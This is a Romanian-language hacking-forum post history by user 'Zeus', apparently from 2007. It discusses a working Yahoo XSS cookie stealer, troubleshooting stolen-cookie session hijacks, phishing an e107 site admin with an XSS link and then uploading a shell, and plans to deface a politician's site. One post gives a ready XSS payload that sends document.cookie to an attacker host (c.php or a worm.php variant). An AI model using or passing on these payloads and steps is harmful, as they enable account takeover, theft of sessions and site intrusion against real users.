Zeus
-
Posts
238 -
Joined
-
Last visited
Posts posted by Zeus
-
-
Ii o intreaga controversa cu hackerit-ul asta... Depinde in ce domeniu esti si cum vezi lucrurile dar totodata nu poti condamna pe nimeni de folosirea acestui cuvant in anumite sensuri ptr. ca asa se intampla in toate cuvintele...
Hack ii o clasa mare cu multe intelesuri...
...de exemplu o alta clasa mare ii Broadband...si asa mai departe...
..se poate spune despre aceste cuvinte ca sunt la un Layer Superior din care fiecare ramura isi atribuie o parte...
...se pare ca Lumea Computerelor o atras ca un magnet aces verb Hack si io dat un sens...pe cand altii il folosesc in cu totul alte sensuri...
...sunt o gramada de articole despre aceste Controverse(http://en.wikipedia.org/wiki/Hacker_definition_controversy)...si nu cred ca cineva poate sa spuna...: Ala ce apasa pe 2 butoane si sparge un sistem nu ii hacker ...ca o sa fie contrazis din alta parte...si tot asa...deci o sa fie non-sens...
-
...yep...this is patched...
-
Sau ca sa il lamuresc pe dizzy mai bine asupra acestor xss. Sa zicem ca incerci orice lucru posibil pe un site cu e107 si vrei sa capeti acces pe el. Ai la indemana o vulnerabilitate xss din search. Postezi pe forum ceva de genul: uitati-va aici poza cu adminul site-ului ce rupt e si marchezi aici ca hyperlink ce include acel xss din search modificat pentru a fura cookie. Iti garantez ca in 90% din cazuri adminul va da click si nu va realiza despre ce este vorba. Dupa ce ii furi cookie te loghezi si din interfata de admin urci un shell pentru a avea acces total. Sper ca esti multumit de exemplul asta (caz real
)...da...asta ii un exemplu "Xss clasic"...(daca il pot numi asa
)...dar dizzy se referea (daca am inteles bine) ...ca aceste XSS-uri sunt "Inutile" daca victima nu le clickuie...sau daca nu ii forum?...sau nimic unde sa postezi?...dar...dar si dar...problema care o ridica...ii ca fara a "prosti" victima nu te poti folosi de acel XSS...... in cazul altor hackereli (cele la care se refera dizzy)...Atacatorul nu are nevoie de User ptr. a hackui...pe cand la Xss-uri (in cele mai multe cazuri) Atacatorul "are nevoie" de "participarea" Victimei...
...oricum cine spune ca Xss nu sunt hackereli sau ca sunt lame si nepericuloase...sa mai aibe putintica rabdare...ca o sa se demonstreze contrariul...toate au un inceput...
-
...da JavaScript este si va deveni si mai Puternic cat de curand(la astfel de aplicatii)...dar deocamdata situatia ii destul de complexa avand la mana doar un XSS in search...
..de Shell da Frumos... poate o sa fac si eu un tutorial (cu niste adaugiri)la ce ii deja prezent pe piatza...
-
...Plus ca se pot face FOARTE MULTE chestii cu un astfel de xss in functie de ce vrea fiecare sa "arda".
Expune cateva exemple concrete inafara de Clikuiri ptr. furaciuni de Cookie...
...cu un Xss in Search esti destul de limitat la oportunitati de atacare...
nu-mi plac alea la care tre sa pacalesti userul sa dea click nu mi se pare a fi hacking ....de ce nu? Hackingul se bazeaza pe eroare umana... (Userul)...ii o metoda simpla si de cele mai multe ori folositoare...
Hackingul ii o clasa mai mare in care sunt incluse toate "ingineriile" astea...; dar ii si normal ca fiecare sa fie cu preferintele lui....
-
-
...idei?
...de cateva luni au mari erori la pagina... dar multe lucruri nu prea sunt de facut cu ce gauri au...
...pe 19 Mai ar fi frumos sa apara Geoana cu morcovele in cur pe prima pagina...
...deci idei???
...nu am mentionat numele lor ...ptr. ca gusterii astia sunt peste tot...si cauta de zor dupa numele lor ....bla bla bla
-
va rog sa mi ziceti si mie daca se poate afla parola de la yahoo cumva. multumesc si scuze daca am postat unde nu trebuia.
...din Cookie NU se poate afla parola...
...cu alte Metode DA....dar ptr. asta posteaza in alte topicuri relevante cererii tale...
...aici ii doar despre acest XSS
-
super tare.merge.
este marfa.puteti sa faceti asa:
puneti linkul si ii puneti redirectionare...cu tagu <url
----------
o intrebare am.
folosesc yahoo decoderul acela din arhiva.
problema este ca imi poate da toate detaliile despre cont, dar cred ca atunci cand incearca sa afle parola da eroarea asta:
"run-time error '5':
invalid procedure call or argument"
ce are?
...Parola NU se poate afla...ii encryptata One Way...
...oricum eroare nu ar trebui sa iti dea...cand pui cookie T o sa iti dea
Prompt for Pass:
-
am urmat toti pasii din tutorial.Am inlocuit Y si T-ul dar cand dau refresh paginii, imi apare userul victimei..si-mi cere parola mai jos.Am omis ceva?..sau nu mai mere?
..nu da refresh...(am mai auzit pb. asta la mai multi)
... incearca sa scri in browser mail.yahoo.com si dai Enter
...asa o sa iti mearga...
-
...ca tot ziceam de reply-uri pe aici pe forum....
Bravo slick ...foarte frumos...
...cu toate ca ma asteptam ca pe acest topic sa fie zeci sau chiar sute de comentarii...despre ce si cum...intrebari...sau doar macar cu un simplu Thx...ptr. ca ii unul dintre cele mai interesante topice de pe forum...
...cred ca ar trebui un tutorial Video aici...sa fie mai frumos...ca din Tutorialele video vad ca se intelege cel mai bine...
8)
-
ok. Bafta in continuare...
...pai intotdeauna ii binevenit un replay la un subiect interesant unde so depus ceva efort...dar vad ca sunt mai multe reply-uri la Off Topic decat la restul...
-
...92 MB...ptr 3:46...cam mult....
...si asta nu pare deloc a Tutorial ...ii mai mult un Show Off...ceea ce ai gasit tu pe serials si craiovahub...
...cand faci un tutorial trebuie sa explici ce si cum...etc....
... and oricum un tutorial bun despre acelasi metode ptr. XSS(intradevar tutorial) era prezentat aici pe forum (de Slick parca)...
...in rest...muzica buna pe fundal...si intentia buna care ai avuto...
...P.S ptr. cei care vor sa mai faca un tutorial despre XSS ar fi indicat sa arate idei noi despre cum sa se foloseasca un XSS... tutorialele (5 la numar parca )prezentate pe forum sunt bune...dar trebuie completate...si cum sa se foloseasca acele vulnerabilitati....deci o idee noua ptr. noi tutoriale... ca sa nu mai fie nevoie de clonarea tutorialelor...
Bafta
-
...vladii si cei care ati mai urmarit tutorialul video despre acest XSS...schimbati si voi cu datele voastre...host, xss obtinut...etc...
...ca ati umplut logul de la xsstest de prajiturele...si nu am nevoie de mailurile voastre...
......and cand mai incercati ceva faceti si voi niste mailuri fantoma...NU mai incercati pe mailurile voastre de zi cu zi...
ex vladii:
..p.s acest XSS se poate folosi si cu Viermele dat de Slick...doar atunci la obtinerea Xss'ului inlocuiti c.php cu worm.php(cand puneti la Username '><SCRIPT>location.href="http://www.yourhost.com/c.php?c="+escape(document.cookie)</SCRIPT> se inlocuieste cu '><SCRIPT>location.href="http://www.yourhost.com/worm.php?c="+escape(document.cookie)</SCRIPT>)
...si yourhost sa fie hostul vostru...nu al meu
)......si nu uitati ca dupa aceea doar acel Xss obtinut trebuie trimis...ca are deja legatura la worm.php...
Bafta
-
frumos...
-
...de ex. asta merge...cel putin de cate ori am Raspuns=True
-
Curios pentru ca eu am Y!M 8.1.0.209 si MyYahoo Module 8.0.0.1 si-mi merge
...da...dar nush ...am incercat atat eu cat si cativa din lista mea...si nu merge... ca doar nu ii atat de greu sa pui msg:id...probabil ii altceva...
-
...nu merge la toti...
...la mine nu merge nici macar atunci cand idul respectiv ii online...
ete ca mie si prietenilor mei ne merge chestia asta... sigur nu faci tu ceva corect...
ce versiune de messenger ai?
...foarte bine... ca merge... eu fac asa cum trebuie...
pai "ete" ca pe Y!M 8.1 nu merge nici o varianta prezentata aici...nici mie nici prietenilor mei...si totul ii facut asa cum trebuie...
...poate merge doar la alte variante...
-
Yahoo Cookie Stealer prezentat de Aviv pe Milworm...o perioada o fost "blocat" (normal ca doar o fost prezentat pe Milworm...)...dar de ceva timp "sio" revenit...si merge Struna...Verificat azi 30.04.2007 aprox 4 am.
De preferat sa ramana in Familia RST ca sa tina cat mai mult...daca va fi iar postat altundeva...atunci....nu se mai stie cat va tine...
...Testat pe IE7, Mozilla, Aol...merge perfect....
Am inclus si un tutorial video...Tutorialul ii ptr. cei care chiar NU au habar de asa ceva...ptr. restul o sa fie plictisitor de urmarit acest tutorial video...sryy ptr. sunetul care so "stricat" putin de la compresie...nush de ce...
Bafta
TOTUL este doar ptr. scopuri Educative...!
http://rapidshare.com/files/28649644/Video_TutorialRSTXSS.rar
-
...nu ii asa palpitant sa citesti un post dupa nenumarate clickuri...
-
...nu merge la toti...
...la mine nu merge nici macar atunci cand idul respectiv ii online...
-
...mai sunt...
-
-
...daca ai "pile" serioase care vor sa isi riste serviciul si libertatea ...Da ...se poate...poti sa iti transferi si numarul altuia de telefon pe cartela ta...asta stiu ca se face obtinand codul pac de la respectivul...si dat la "pila" ta...
...deci asa complicat se poate... in rest... deocamdata NU
Ce este un hacker?
in Off-topic
Posted
...din punctul tau de vedere...si al meu si poate inca 2,3 ...n dar din punctul altora de vedere NU...
...& daca o luam pe partea filozofica... o putem intoarce pe toate partile...
...nu cred ca ii oo discutie unde se poate gasi un numitor comun...; ca si in Biblie... cititorul ii da sens informatiei...care ii adevarata???...pai cea care il reprezinta...
...spargei tu un site la un om de afaceri care nu ii implicat in Computere...(ex: vinde pantofi)...si o sa vezi ca zice: Am fost Hackerit!..de cine? de un hacker... Indiferent daca "hackerul" o apasat pe doua butoane sau nu....; chiar daca o sa afle ca "hackerul" o apasat doar 2 butoane si nu o facut mai mult el tot asa o sa zica....ca doar nu o sa zica...am fost userit
...Greseste cu ceva???...NU...etc....etc....etc....
...dupa cum spuneam...daca o luam pe partea filozofica...etc...
...& dizzy...nu zice nimeni ca tu nu ai dreptate...ai 100%;...si nu cred ca te poate contrazice nimeni...dar nici tu la randul tau nu ii poti contrazice pe cei ce atribuie cuvantul hacker unui alt inteles decat cel ce tu esti obisnuit...ptr. ca acest cuvant NU este Inventat , "brevetat" , de "lumea computerelor" ... cu referie Doar la aceasta imprejurare...